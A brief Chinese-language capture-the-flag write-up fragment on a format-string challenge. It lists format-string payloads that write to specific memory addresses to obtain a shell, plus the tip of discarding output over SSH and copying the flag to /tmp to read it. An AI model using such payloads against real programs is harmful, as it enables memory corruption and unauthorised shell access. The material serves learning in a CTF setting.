打完之后看了下别人的wp…..发现我的完全是邪道……(后面又仔细看了下,发现并没有太邪道,其实也是差不多
因为用ssh登录上去执行,所以可以把输出重定向一下 /dev/null 2>&1
这样就可以避免因为传输东西太多而卡死
然后可以直接用下面payload
%134520928c%14$n
%20$n
%134520932c%14$n
%20$n
之后就可以拿到一个shell,虽然这个shell没回显,但是只要把flag复制到tmp,然后再去tmp cat一下就能拿到flag了